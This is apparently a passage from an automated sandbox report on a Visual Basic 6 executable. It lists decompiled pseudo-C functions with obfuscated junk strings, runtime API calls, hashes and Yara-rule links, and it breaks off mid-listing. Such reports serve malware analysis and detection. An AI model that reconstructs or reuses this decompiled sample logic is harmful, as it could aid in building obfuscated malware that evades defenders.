                                  Uniqueness Score: -1.00%

                                  Function 022D7955, Relevance: .0, Instructions: 30COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90858f0e3a947476bc2b1d92af287979cab3683737c73641d235f26a59f64b07
                                  • Instruction ID: 26894ec572864514e44b410f6c95b414f07533a4c4e7eecb8ecc3739c6ca088d
                                  • Opcode Fuzzy Hash: 90858f0e3a947476bc2b1d92af287979cab3683737c73641d235f26a59f64b07
                                  • Instruction Fuzzy Hash: C6F01C36335502CFDB34DAA8C994FA5F3A5AB29310FC58556D945CB1A9D328DC80CA11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D41B2, Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2cf5dfd73afe5378935f0d980e5a5bec751bb5a224cc4eee3fe8b8ac755c9099
                                  • Instruction ID: 3f97437f93b451d58b73fa931180a2fdd284386eb273cf37d53376ca4a7ddb30
                                  • Opcode Fuzzy Hash: 2cf5dfd73afe5378935f0d980e5a5bec751bb5a224cc4eee3fe8b8ac755c9099
                                  • Instruction Fuzzy Hash: 7CC092BA261682CFFF46EA08C592B5073B0FB25B84F0804E0EC02DB725C368FE00CA10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D6D7F, Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32da10e9b002e1401f983e42faa2ee9ebb219cd2c62147ccb46c6779b09294b5
                                  • Instruction ID: dce04724580d51ddbef95d8dcc6d1d02883fc82ceecb7bae6055deb335abedbd
                                  • Opcode Fuzzy Hash: 32da10e9b002e1401f983e42faa2ee9ebb219cd2c62147ccb46c6779b09294b5
                                  • Instruction Fuzzy Hash: 04C04C382397408BCA95CE89E090E6073A4BB14600BC11999F4418B619C295D841C905
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004110E9, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 128COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E004110E9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v60;
				char _v68;
				signed int _v76;
				intOrPtr _v84;
				void* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				char _v108;
				signed int _v112;
				signed int _v116;
				signed int _t52;
				char* _t56;
				signed int _t64;
				char* _t67;
				char* _t68;
				signed int _t71;
				intOrPtr _t87;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t87;
				_push(0x60);
				L004014F0();
				_v12 = _t87;
				_v8 = 0x401398;
				_v60 = 9;
				_v68 = 2;
				_t52 =  &_v68;
				_push(_t52);
				L004015CE();
				L0040161C();
				_push(_t52);
				_push(0x402c88);
				L00401694();
				asm("sbb eax, eax");
				_v88 =  ~( ~( ~_t52));
				L0040169A();
				L0040167C();
				_t56 = _v88;
				if(_t56 != 0) {
					_push(0);
					_push(L"x8fUMMtVOCiI0GoL8IpFNUxt53autS29U92");
					_push( &_v40);
					_push( &_v68);
					L004015C8();
					if( *0x41333c != 0) {
						_v108 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x402774);
						L004016B8();
						_v108 = 0x41333c;
					}
					_t15 =  &_v108; // 0x41333c
					_v88 =  *((intOrPtr*)( *_t15));
					_t64 =  *((intOrPtr*)( *_v88 + 0x1c))(_v88,  &_v48);
					asm("fclex");
					_v92 = _t64;
					if(_v92 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x402764);
						_push(_v88);
						_push(_v92);
						L004016B2();
						_v112 = _t64;
					}
					_v96 = _v48;
					_v76 = _v76 & 0x00000000;
					_v84 = 2;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t67 =  &_v68;
					L004015C2();
					_t68 =  &_v52;
					L00401652();
					_t71 =  *((intOrPtr*)( *_v96 + 0x58))(_v96, _t68, _t68, _t67, _t67, 0x402cd8, 0x10);
					asm("fclex");
					_v100 = _t71;
					if(_v100 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x402c08);
						_push(_v96);
						_push(_v100);
						L004016B2();
						_v116 = _t71;
					}
					_push( &_v48);
					_t56 =  &_v52;
					_push(_t56);
					_push(2);
					L0040164C();
					L0040167C();
				}
				_push(0x41129f);
				L0040167C();
				return _t56;
			}



























                                  0x004110ee
                                  0x004110f9
                                  0x004110fa
                                  0x00411101
                                  0x00411104
                                  0x0041110c
                                  0x0041110f
                                  0x00411116
                                  0x0041111d
                                  0x00411124
                                  0x00411127
                                  0x00411128
                                  0x00411132
                                  0x00411137
                                  0x00411138
                                  0x0041113d
                                  0x00411144
                                  0x0041114a
                                  0x00411151
                                  0x00411159
                                  0x0041115e
                                  0x00411164
                                  0x0041116a
                                  0x0041116c
                                  0x00411174
                                  0x00411178
                                  0x00411179
                                  0x00411188
                                  0x004111a2
                                  0x0041118a
                                  0x0041118a
                                  0x0041118f
                                  0x00411194
                                  0x00411199
                                  0x00411199
                                  0x004111a9
                                  0x004111ae
                                  0x004111bd
                                  0x004111c0
                                  0x004111c2
                                  0x004111c9
                                  0x004111e2
                                  0x004111cb
                                  0x004111cb
                                  0x004111cd
                                  0x004111d2
                                  0x004111d5
                                  0x004111d8
                                  0x004111dd
                                  0x004111dd
                                  0x004111e9
                                  0x004111ec
                                  0x004111f0
                                  0x004111fa
                                  0x00411204
                                  0x00411205
                                  0x00411206
                                  0x00411207
                                  0x0041120d
                                  0x00411211
                                  0x00411217
                                  0x0041121b
                                  0x00411229
                                  0x0041122c
                                  0x0041122e
                                  0x00411235
                                  0x0041124e
                                  0x00411237
                                  0x00411237
                                  0x00411239
                                  0x0041123e
                                  0x00411241
                                  0x00411244
                                  0x00411249
                                  0x00411249
                                  0x00411255
                                  0x00411256
                                  0x00411259
                                  0x0041125a
                                  0x0041125c
                                  0x00411267
                                  0x00411267
                                  0x0041126c
                                  0x00411299
                                  0x0041129e

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411104
                                  • #574.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00411128
                                  • __vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00411132
                                  • __vbaStrCmp.MSVBVM60(00402C88,00000000,00000002), ref: 0041113D
                                  • __vbaFreeStr.MSVBVM60(00402C88,00000000,00000002), ref: 00411151
                                  • __vbaFreeVar.MSVBVM60(00402C88,00000000,00000002), ref: 00411159
                                  • __vbaVarLateMemCallLd.MSVBVM60(00000002,?,x8fUMMtVOCiI0GoL8IpFNUxt53autS29U92,00000000,00402C88,00000000,00000002), ref: 00411179
                                  • __vbaNew2.MSVBVM60(00402774,0041333C), ref: 00411194
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,0000001C), ref: 004111D8
                                  • __vbaChkstk.MSVBVM60(00000000,?,00402764,0000001C), ref: 004111FA
                                  • __vbaCastObjVar.MSVBVM60(?,00402CD8), ref: 00411211
                                  • __vbaObjSet.MSVBVM60(?,00000000,?,00402CD8), ref: 0041121B
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402C08,00000058), ref: 00411244
                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041125C
                                  • __vbaFreeVar.MSVBVM60 ref: 00411267
                                  • __vbaFreeVar.MSVBVM60(0041129F,00402C88,00000000,00000002), ref: 00411299
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckChkstkHresult$#574CallCastLateListMoveNew2
                                  • String ID: <3A$x8fUMMtVOCiI0GoL8IpFNUxt53autS29U92
                                  • API String ID: 889233846-2466621088
                                  • Opcode ID: d262be2e919383e86f740ef97871019d2073ea3851b0d450294039d9b4a6ba77
                                  • Instruction ID: 17b96818eb2c7fecb0aa1df0423dc371e2181a2fbca6be2ebe8dfa8e6fed13c0
                                  • Opcode Fuzzy Hash: d262be2e919383e86f740ef97871019d2073ea3851b0d450294039d9b4a6ba77
                                  • Instruction Fuzzy Hash: FE413871D40218AFDB00EFE5CD46FEDBBB8AF08704F10452AE501BB2A1DB795945CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041086E, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E0041086E(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v32;
				char _v36;
				char _v52;
				char* _v60;
				intOrPtr _v68;
				void* _v72;
				signed int _v76;
				char _v84;
				signed int _v88;
				signed int _t35;
				signed int _t39;
				char* _t42;
				intOrPtr _t61;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t61;
				_push(0x44);
				L004014F0();
				_v12 = _t61;
				_v8 = 0x401338;
				L004016A6();
				_v60 = L"HYPERTHERMESTHESIA";
				_v68 = 8;
				L00401634();
				_t35 =  &_v52;
				_push(_t35);
				L00401616();
				L0040161C();
				_push(_t35);
				_push(L"String");
				L00401694();
				asm("sbb eax, eax");
				_v72 =  ~( ~( ~_t35));
				L0040169A();
				L0040167C();
				_t39 = _v72;
				if(_t39 != 0) {
					if( *0x41333c != 0) {
						_v84 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x402774);
						L004016B8();
						_v84 = 0x41333c;
					}
					_t17 =  &_v84; // 0x41333c
					_v72 =  *((intOrPtr*)( *_t17));
					_t42 =  &_v36;
					L00401610();
					_t39 =  *((intOrPtr*)( *_v72 + 0x10))(_v72, _t42, _t42, _a4);
					asm("fclex");
					_v76 = _t39;
					if(_v76 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x402764);
						_push(_v72);
						_push(_v76);
						L004016B2();
						_v88 = _t39;
					}
					L004016AC();
				}
				_push(0x4109a0);
				L0040169A();
				return _t39;
			}



















                                  0x00410873
                                  0x0041087e
                                  0x0041087f
                                  0x00410886
                                  0x00410889
                                  0x00410891
                                  0x00410894
                                  0x004108a1
                                  0x004108a6
                                  0x004108ad
                                  0x004108ba
                                  0x004108bf
                                  0x004108c2
                                  0x004108c3
                                  0x004108cd
                                  0x004108d2
                                  0x004108d3
                                  0x004108d8
                                  0x004108df
                                  0x004108e5
                                  0x004108ec
                                  0x004108f4
                                  0x004108f9
                                  0x004108ff
                                  0x00410908
                                  0x00410922
                                  0x0041090a
                                  0x0041090a
                                  0x0041090f
                                  0x00410914
                                  0x00410919
                                  0x00410919
                                  0x00410929
                                  0x0041092e
                                  0x00410934
                                  0x00410938
                                  0x00410946
                                  0x00410949
                                  0x0041094b
                                  0x00410952
                                  0x0041096b
                                  0x00410954
                                  0x00410954
                                  0x00410956
                                  0x0041095b
                                  0x0041095e
                                  0x00410961
                                  0x00410966
                                  0x00410966
                                  0x00410972
                                  0x00410972
                                  0x00410977
                                  0x0041099a
                                  0x0041099f

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410889
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 004108A1
                                  • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004108BA
                                  • #591.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004108C3
                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004108CD
                                  • __vbaStrCmp.MSVBVM60(String,00000000,?), ref: 004108D8
                                  • __vbaFreeStr.MSVBVM60(String,00000000,?), ref: 004108EC
                                  • __vbaFreeVar.MSVBVM60(String,00000000,?), ref: 004108F4
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,String,00000000,?), ref: 00410914
                                  • __vbaObjSetAddref.MSVBVM60(?,?,String,00000000,?), ref: 00410938
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,00000010), ref: 00410961
                                  • __vbaFreeObj.MSVBVM60(00000000,?,00402764,00000010), ref: 00410972
                                  • __vbaFreeStr.MSVBVM60(004109A0,String,00000000,?), ref: 0041099A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#591AddrefCheckChkstkCopyHresultMoveNew2
                                  • String ID: <3A$HYPERTHERMESTHESIA$String
                                  • API String ID: 2730007994-3017362109
                                  • Opcode ID: 1ff3443ce95abe6798c551bbeb15639f23b9af8f50529af3a2f323dabd1f6780
                                  • Instruction ID: 99f04bcde1ae3b6ed882bf43f379ec7e2f881dfd68b777030136e5fd42212704
                                  • Opcode Fuzzy Hash: 1ff3443ce95abe6798c551bbeb15639f23b9af8f50529af3a2f323dabd1f6780
                                  • Instruction Fuzzy Hash: 2D311870910209AFDF00EFA1CD55EEDB7B8BF04704F64492AB401B71E2DBB96A858B19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411AE8, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E00411AE8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				char _v64;
				char* _v72;
				intOrPtr _v80;
				void* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				char* _t57;
				char* _t58;
				signed int _t64;
				signed int _t70;
				intOrPtr _t91;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t91;
				_push(0x60);
				L004014F0();
				_v12 = _t91;
				_v8 = 0x401408;
				L004016A6();
				_v72 = L"2-2-2";
				_v80 = 8;
				L00401634();
				_t57 =  &_v64;
				_push(_t57);
				L00401598();
				_v84 =  ~(0 | _t57 != 0x0000ffff);
				L0040167C();
				_t58 = _v84;
				if(_t58 != 0) {
					if( *0x41333c != 0) {
						_v108 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x402774);
						L004016B8();
						_v108 = 0x41333c;
					}
					_t17 =  &_v108; // 0x41333c
					_v84 =  *((intOrPtr*)( *_t17));
					_t64 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84,  &_v44);
					asm("fclex");
					_v88 = _t64;
					if(_v88 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x402764);
						_push(_v84);
						_push(_v88);
						L004016B2();
						_v112 = _t64;
					}
					_v92 = _v44;
					_v72 = 0x80020004;
					_v80 = 0xa;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t70 =  *((intOrPtr*)( *_v92 + 0x54))(_v92, 0x10,  &_v48);
					asm("fclex");
					_v96 = _t70;
					if(_v96 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x402c08);
						_push(_v92);
						_push(_v96);
						L004016B2();
						_v116 = _t70;
					}
					_v104 = _v48;
					_v48 = _v48 & 0x00000000;
					_push(_v104);
					_t58 =  &_v36;
					_push(_t58);
					L004015DA();
					L004016AC();
				}
				_push(0x411c75);
				L0040167C();
				L0040169A();
				return _t58;
			}

























                                  0x00411aed
                                  0x00411af8
                                  0x00411af9
                                  0x00411b00
                                  0x00411b03
                                  0x00411b0b
                                  0x00411b0e
                                  0x00411b1b
                                  0x00411b20
                                  0x00411b27
                                  0x00411b34
                                  0x00411b39
                                  0x00411b3c
                                  0x00411b3d
                                  0x00411b4d
                                  0x00411b54
                                  0x00411b59
                                  0x00411b5f
                                  0x00411b6c
                                  0x00411b86
                                  0x00411b6e
                                  0x00411b6e
                                  0x00411b73
                                  0x00411b78
                                  0x00411b7d
                                  0x00411b7d
                                  0x00411b8d
                                  0x00411b92
                                  0x00411ba1
                                  0x00411ba4
                                  0x00411ba6
                                  0x00411bad
                                  0x00411bc6
                                  0x00411baf
                                  0x00411baf
                                  0x00411bb1
                                  0x00411bb6
                                  0x00411bb9
                                  0x00411bbc
                                  0x00411bc1
                                  0x00411bc1
                                  0x00411bcd
                                  0x00411bd0
                                  0x00411bd7
                                  0x00411be5
                                  0x00411bef
                                  0x00411bf0
                                  0x00411bf1
                                  0x00411bf2
                                  0x00411bfb
                                  0x00411bfe
                                  0x00411c00
                                  0x00411c07
                                  0x00411c20
                                  0x00411c09
                                  0x00411c09
                                  0x00411c0b
                                  0x00411c10
                                  0x00411c13
                                  0x00411c16
                                  0x00411c1b
                                  0x00411c1b
                                  0x00411c27
                                  0x00411c2a
                                  0x00411c2e
                                  0x00411c31
                                  0x00411c34
                                  0x00411c35
                                  0x00411c3d
                                  0x00411c3d
                                  0x00411c42
                                  0x00411c67
                                  0x00411c6f
                                  0x00411c74

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411B03
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00411B1B
                                  • __vbaVarDup.MSVBVM60 ref: 00411B34
                                  • #557.MSVBVM60(?), ref: 00411B3D
                                  • __vbaFreeVar.MSVBVM60(?), ref: 00411B54
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,?), ref: 00411B78
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,0000001C,?,?,?,?,?,?,?), ref: 00411BBC
                                  • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00411BE5
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402C08,00000054,?,?,?,?,?,?,?), ref: 00411C16
                                  • __vbaVarSetObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 00411C35
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 00411C3D
                                  • __vbaFreeVar.MSVBVM60(00411C75,?), ref: 00411C67
                                  • __vbaFreeStr.MSVBVM60(00411C75,?), ref: 00411C6F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckChkstkHresult$#557CopyNew2
                                  • String ID: 2-2-2$<3A
                                  • API String ID: 2147256735-738456227
                                  • Opcode ID: 7055d54e63ea83b9e7a15151454da2c1a490afb83618289a720ed7de164ef627
                                  • Instruction ID: 53fae06a657f061a9fd60a9b7787007a4bf2cf34e62ded8f3363e0f4b683a36c
                                  • Opcode Fuzzy Hash: 7055d54e63ea83b9e7a15151454da2c1a490afb83618289a720ed7de164ef627
                                  • Instruction Fuzzy Hash: A6410370D40248AFCF00EFE5C945BDDBBB4AF08704F10842AE511BB2A1EBB96985CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041189D, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 111COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0041189D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				void* _v48;
				void* _v52;
				signed int _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				void* _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				signed int _v100;
				char _v104;
				signed int _v108;
				signed int _v112;
				signed int _t54;
				char* _t58;
				signed int _t64;
				signed int _t70;
				void* _t82;
				void* _t84;
				intOrPtr _t85;

				_t85 = _t84 - 0xc;
				 *[fs:0x0] = _t85;
				L004014F0();
				_v16 = _t85;
				_v12 = 0x4013f8;
				_v8 = 0;
				_t54 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x4014f6, _t82);
				L0040159E();
				L0040161C();
				_push(_t54);
				_push(L"smeltepunktsbestemmelsens");
				L00401694();
				asm("sbb eax, eax");
				_v76 =  ~( ~_t54 + 1);
				L0040169A();
				_t58 = _v76;
				if(_t58 != 0) {
					if( *0x41333c != 0) {
						_v104 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x402774);
						L004016B8();
						_v104 = 0x41333c;
					}
					_t13 =  &_v104; // 0x41333c
					_v76 =  *((intOrPtr*)( *_t13));
					_t15 =  &_v52; // 0x402774
					_t64 =  *((intOrPtr*)( *_v76 + 0x4c))(_v76, _t15);
					asm("fclex");
					_v80 = _t64;
					if(_v80 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x402764);
						_push(_v76);
						_push(_v80);
						L004016B2();
						_v108 = _t64;
					}
					_v84 = _v52;
					_v64 = 0xad;
					_v72 = 2;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t70 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84, 0x10,  &_v56);
					asm("fclex");
					_v88 = _t70;
					if(_v88 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x402b80);
						_push(_v84);
						_push(_v88);
						L004016B2();
						_v112 = _t70;
					}
					_v100 = _v56;
					_v56 = _v56 & 0x00000000;
					_push(_v100);
					_t58 =  &_v40;
					_push(_t58);
					L004015DA();
					L004016AC();
				}
				_push(0x411a1e);
				L0040167C();
				return _t58;
			}



























                                  0x004118a0
                                  0x004118af
                                  0x004118b9
                                  0x004118c1
                                  0x004118c4
                                  0x004118cb
                                  0x004118da
                                  0x004118dd
                                  0x004118e7
                                  0x004118ec
                                  0x004118ed
                                  0x004118f2
                                  0x004118f9
                                  0x004118fe
                                  0x00411905
                                  0x0041190a
                                  0x00411910
                                  0x0041191d
                                  0x00411937
                                  0x0041191f
                                  0x0041191f
                                  0x00411924
                                  0x00411929
                                  0x0041192e
                                  0x0041192e
                                  0x0041193e
                                  0x00411943
                                  0x00411946
                                  0x00411952
                                  0x00411955
                                  0x00411957
                                  0x0041195e
                                  0x00411977
                                  0x00411960
                                  0x00411960
                                  0x00411962
                                  0x00411967
                                  0x0041196a
                                  0x0041196d
                                  0x00411972
                                  0x00411972
                                  0x0041197e
                                  0x00411981
                                  0x00411988
                                  0x00411996
                                  0x004119a0
                                  0x004119a1
                                  0x004119a2
                                  0x004119a3
                                  0x004119ac
                                  0x004119af
                                  0x004119b1
                                  0x004119b8
                                  0x004119d1
                                  0x004119ba
                                  0x004119ba
                                  0x004119bc
                                  0x004119c1
                                  0x004119c4
                                  0x004119c7
                                  0x004119cc
                                  0x004119cc
                                  0x004119d8
                                  0x004119db
                                  0x004119df
                                  0x004119e2
                                  0x004119e5
                                  0x004119e6
                                  0x004119ee
                                  0x004119ee
                                  0x004119f3
                                  0x00411a18
                                  0x00411a1d

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004118B9
                                  • #669.MSVBVM60(?,?,?,?,004014F6), ref: 004118DD
                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004014F6), ref: 004118E7
                                  • __vbaStrCmp.MSVBVM60(smeltepunktsbestemmelsens,00000000,?,?,?,?,004014F6), ref: 004118F2
                                  • __vbaFreeStr.MSVBVM60(smeltepunktsbestemmelsens,00000000,?,?,?,?,004014F6), ref: 00411905
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,smeltepunktsbestemmelsens,00000000,?,?,?,?,004014F6), ref: 00411929
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,0000004C), ref: 0041196D
                                  • __vbaChkstk.MSVBVM60(?), ref: 00411996
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402B80,0000001C), ref: 004119C7
                                  • __vbaVarSetObj.MSVBVM60(00000000,?), ref: 004119E6
                                  • __vbaFreeObj.MSVBVM60(00000000,?), ref: 004119EE
                                  • __vbaFreeVar.MSVBVM60(00411A1E,smeltepunktsbestemmelsens,00000000,?,?,?,?,004014F6), ref: 00411A18
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckChkstkHresult$#669MoveNew2
                                  • String ID: <3A$smeltepunktsbestemmelsens$t'@<3A
                                  • API String ID: 2737308835-2847435625
                                  • Opcode ID: 1922ddb9390f4d7fe267854a4397d4986880b52bdddab55c74f3aa6ef4ec89ad
                                  • Instruction ID: c71496e89249ec1c4d49488f141e691ceec49610a2e7e48a3ec0f652f26d23f0
                                  • Opcode Fuzzy Hash: 1922ddb9390f4d7fe267854a4397d4986880b52bdddab55c74f3aa6ef4ec89ad
                                  • Instruction Fuzzy Hash: 87411770D10208AFDF00EFA5C959BDDBBB4BF08704F20842AF511BB2A1C7799985DB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004102C2, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 96COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E004102C2(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v52;
				char* _v76;
				char _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				signed int _t50;
				signed int _t51;
				signed int _t55;
				char* _t59;
				intOrPtr _t73;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_push(0x60);
				L004014F0();
				_v12 = _t73;
				_v8 = 0x4012e0;
				L004016A6();
				_push( &_v52);
				L00401658();
				_v76 = L"Ferae";
				_v84 = 0x8008;
				_push( &_v52);
				_t50 =  &_v84;
				_push(_t50);
				L0040165E();
				_v88 = _t50;
				L0040167C();
				_t51 = _v88;
				if(_t51 != 0) {
					_t55 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
					asm("fclex");
					_v88 = _t55;
					if(_v88 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40256c);
						_push(_a4);
						_push(_v88);
						L004016B2();
						_v108 = _t55;
					}
					if( *0x41333c != 0) {
						_v112 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x402774);
						L004016B8();
						_v112 = 0x41333c;
					}
					_t26 =  &_v112; // 0x41333c
					_v92 =  *((intOrPtr*)( *_t26));
					_v104 = _v32;
					_v32 = _v32 & 0x00000000;
					_t59 =  &_v36;
					L00401652();
					_t51 =  *((intOrPtr*)( *_v92 + 0x40))(_v92, _t59, _t59, _v104, L"mugningen");
					asm("fclex");
					_v96 = _t51;
					if(_v96 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x402764);
						_push(_v92);
						_push(_v96);
						L004016B2();
						_v116 = _t51;
					}
					L004016AC();
				}
				_push(0x41042b);
				L0040169A();
				return _t51;
			}























                                  0x004102c7
                                  0x004102d2
                                  0x004102d3
                                  0x004102da
                                  0x004102dd
                                  0x004102e5
                                  0x004102e8
                                  0x004102f5
                                  0x004102fd
                                  0x004102fe
                                  0x00410303
                                  0x0041030a
                                  0x00410314
                                  0x00410315
                                  0x00410318
                                  0x00410319
                                  0x0041031e
                                  0x00410325
                                  0x0041032a
                                  0x00410330
                                  0x00410342
                                  0x00410348
                                  0x0041034a
                                  0x00410351
                                  0x0041036d
                                  0x00410353
                                  0x00410353
                                  0x00410358
                                  0x0041035d
                                  0x00410360
                                  0x00410363
                                  0x00410368
                                  0x00410368
                                  0x00410378
                                  0x00410392
                                  0x0041037a
                                  0x0041037a
